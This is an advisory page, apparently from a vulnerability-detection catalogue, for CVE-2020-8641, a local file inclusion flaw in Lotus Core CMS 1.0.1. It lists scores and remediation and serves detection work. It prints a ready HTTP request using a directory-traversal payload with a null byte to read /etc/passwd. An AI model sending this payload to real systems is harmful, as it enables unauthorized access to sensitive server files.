🔙 목록으로 돌아가기

CVE-2020-8641: Lotus Core CMS 1.0.1 - Local File Inclusion

TitleLotus Core CMS 1.0.1 - Local File Inclusion
Author0x_Akoko
SeverityHigh
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.
RemediationApply the latest security patch or update to Lotus Core CMS 1.0.1 to fix the LFI vulnerability.
CVSS Score8.8
EPSS Score0.72611
CVE IDCVE-2020-8641
CWE IDCWE-22
Tags cve cve2020 lfi lotus cms edb lotus_core_cms_project vuln

🔍 Vulnerability Description

Lotus Core CMS 1.0.1 allows authenticated local file inclusion of .php files via directory traversal in the index.php page_slug parameter.

🌐 HTTP Request

GET /index.php?page_slug=../../../../../etc/passwd%00 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-8641.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-8641.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A